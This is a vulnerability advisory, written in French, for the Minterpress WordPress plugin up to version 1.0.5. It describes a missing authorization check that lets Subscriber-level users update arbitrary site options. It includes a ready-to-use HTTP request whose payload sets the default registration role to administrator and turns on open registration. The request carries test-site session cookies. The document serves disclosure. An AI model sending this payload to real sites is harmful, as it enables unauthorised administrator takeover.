
Minterpress <= 1.0.5 - Absence d'autorisation pour les utilisateurs authentifiés (Subscriber+) Mise à jour arbitraire des options
Minterpress <= 1.0.5 - Authorization manquante pour la mise à jour arbitraire d'options par des utilisateurs authentifiés (Abonné+)
Le plugin Minterpress pour WordPress est vulnérable à la modification non autorisée de données pouvant conduire à une escalade de privilèges en raison d'une absence de vérification de capacité sur une fonction dans toutes les versions jusqu'à la 1.0.5 incluse. Cela permet à des attaquants authentifiés, avec un accès de niveau Abonné ou supérieur, de mettre à jour des options arbitraires sur le site WordPress. Cela peut être exploité pour modifier le rôle par défaut d'inscription en administrateur et activer l'inscription des utilisateurs afin que les attaquants puissent obtenir un accès administratif à un site vulnérable.
Remplacez les cookies par ceux de votre utilisateur connecté.
POST /wp-admin/admin-ajax.php HTTP/2
Host: wp-dev.ddev.site
Content-Type: application/x-www-form-urlencoded
Content-Length: 87
Cookie: wordpress_sec_738b26438442006baf5dc1367e0c0fd7=superadmin%7C1734790221%7CenzNuyQN6cnP5g8Bmw6ZVil29WJCzcIc1bx3Z10l32r%7C31038bfa66d0777c50fba66263f613d288a20d1e14dfc0fc06903f77d1c9e41f; popup_time=2; alwaysStrip=1; _ga=GA1.2.1953252658.1732269795; _ga_16PD6PV48S=GS1.2.1732269795.1.0.1732270283.0.0.0; wp-settings-time-1=1734520301; wp-settings-1=libraryContent%3Dbrowse; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_738b26438442006baf5dc1367e0c0fd7=superadmin%7C1734790221%7CenzNuyQN6cnP5g8Bmw6ZVil29WJCzcIc1bx3Z10l32r%7C987ff9134b881efe3cced2fa12593fd0ba5b2b02613fb93f48433b112015551a; PHPSESSID=49f0a4bfb294cad31ed4a83ede9bf485; tk_ai=zv7IX5yQT%2F6RzXuKQwqmMvEV; th_shop_mania_thms_time=1735227350366; tk_qs=
action=update_options&options={"default_role":"administrator","users_can_register":"1"}